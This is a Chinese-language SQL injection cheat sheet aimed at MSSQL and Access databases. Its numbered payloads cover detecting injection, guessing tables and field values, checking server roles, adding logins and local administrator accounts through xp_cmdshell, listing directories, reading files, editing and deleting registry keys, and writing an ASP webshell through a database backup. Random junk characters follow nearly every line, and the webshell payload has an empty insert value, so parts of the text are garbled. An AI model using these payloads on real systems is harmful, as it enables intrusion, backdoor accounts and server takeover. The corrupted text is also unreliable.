1.判断是否有注入;and 1=1 ;and 1=2 _`6fGu& W
2.初步判断是否是mssql ;and user>0 8?ig/HSt2
q,b6).
3.注入参数是字符'and [查询条件] and ''=' dWR0tS6vR`
,E&PIbDL1
4.搜索时没过滤参数的'and [查询条件] and '%25'=' P'Q|0lB
S $wx>715
5.判断数据库系统 N>,`l
lMpjE
;and (select count(*) from sysobjects)>0 mssql c%2C\UB
~ Iin|
;and (select count(*) from msysobjects)>0 access J;Y=oB
K-D{Z7J^l
W<Ms0
&,?bX])
6.猜数据库 ;and (select Count(*) from [数据库名])>0 0bY}<x(;
sTu6KMn
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 tvNh@it:F
0Q@
&z
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 om$x;L6
!>$tRW?gH~
9.(1)猜字段的ascii值(access) CD$0Z
9uk}r; %9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sT|$@$bN
{XC1B
(2)猜字段的ascii值(mssql) 3GEI) !
{d`e9^Z:
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 S+c)
~udi=J|
10.测试权限结构(mssql) b"U{@
')pXQ
eKdF-;
D ff0$06Nq
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ,sEu[m
]y*AA58;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MB$K ?"Y
$JKR,
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- .~#<>
rLMjN#`^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <DG=qP6O
p4m9@\gn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- anwMG0
.+1.??8:+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- sflH{!;p
0fgt2gA33
;and 1=(select IS_MEMBER('db_owner'));-- ZA4NVt.yN
jq6BwUN
Ap}^6_YXd
fbF *C V
11.添加mssql和系统的帐户 \A
gPkW
R~40,$e{
;exec master.dbo.sp_addlogin username;-- O 0Fw!IQk
;exec master.dbo.sp_password null,username,password;-- W5a)`%H
I[|5 DQ
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- rCGyr}(NC
(_^pX
;exec master.dbo.xp_cmdshell 'net user username password YGy.39@31
7P}&<;5zD
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- *b+ef
Kk?P89=*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ia.9 5H;
$~M#msK9
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?)=A[
g~FA:R
ya7/&Z
)0
CRy;>UI
12.(1)遍历目录 r+8%oWj
r5ONAa3.
;create table dirs(paths varchar(100), id int) WLr\ l29
/A3tY"Vn
;insert dirs exec master.dbo.xp_dirtree 'c:\' X}?`G?'
#h'F6
;and (select top 1 paths from dirs)>0 #7S[Ch}O
ZJev_mj
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) l4c9.'6
ur\v[k=
Sp+ zP-3
;q:.&dak1
(2)遍历目录 c`]_Q1'30w
{Lj]++`fB]
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k@1\ULo
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 NFT&\6!o
M1><K:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \(9hg.E
|KR;$e&
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 8,0p14I5;
(8C
,"Dc[0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 c8qsp n
p|Po##E}g^
=5bef8 O
?3ldHWa
13.mssql中的存储过程 Z1j3 F
uY]nqb
xp_regenumvalues 注册表根键, 子键 hr9[$4'H
` <+MR6M
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 uW*)B_c
/Jz?~H{%n
xp_regread 根键,子键,键值名 e 5hq>K
N%Gb
;exec xp_regread RJ/4T#b"+
(UWV#AR
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 !Yx9=>R
$q`650&S*
xp_regwrite 根键,子键, 值名, 值类型, 值 E"p;
9&R. <I
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 m,i@
>sW9n[
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 3ifQKKcR{
?Rlo<f:Mf
xp_regdeletevalue 根键,子键,值名 +{
Q]$b
.W_'6Q+
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 KiN8N=z
"F
nH>g-
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qV^Z@N+,
E/MD]ox
w'NL\>
Opc, {,z6
14.mssql的backup创建webshell .t\#>Fe
j2A
Z.s
use model 4+fWIY1
"
9VyY[&
create table cmd(str image); L;d(|7BVv
5;{Q >n
insert into cmd(str) values (''); p^u;]~JO
&rY73qfP'
backup database model to disk='c:\l.asp'; 'CiV=&3/
r(g:b
^S
_]~`t+W'DJ
CmyCne
15.mssql内置函数 !g=2U`j^
<Sm@ !yx
;and (select @@version)>0 获得Windows的版本号 Fk01j;k.H
49vKb(bz{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa AN-qcp6=o
Z_iVOctP
;and (select user_name())>0 爆当前系统的连接用户 G.CkceWRn
.wj?}Fr?97
;and (select db_name())>0 得到当前连接的数据库 ]3B8D<p
L\1&$|?
u-yVc*<,
R(jp
16.简洁的webshell T0=8 U;
=
hfUN~89;
use model /DxaKZ ;b
s,&tD
WU
create table cmd(str image); sFhmp
.UJp#/EHs
insert into cmd(str) values (''); 8|FHr,
s];jroW@u
backup database model to disk='g:\wwwtest\l.asp';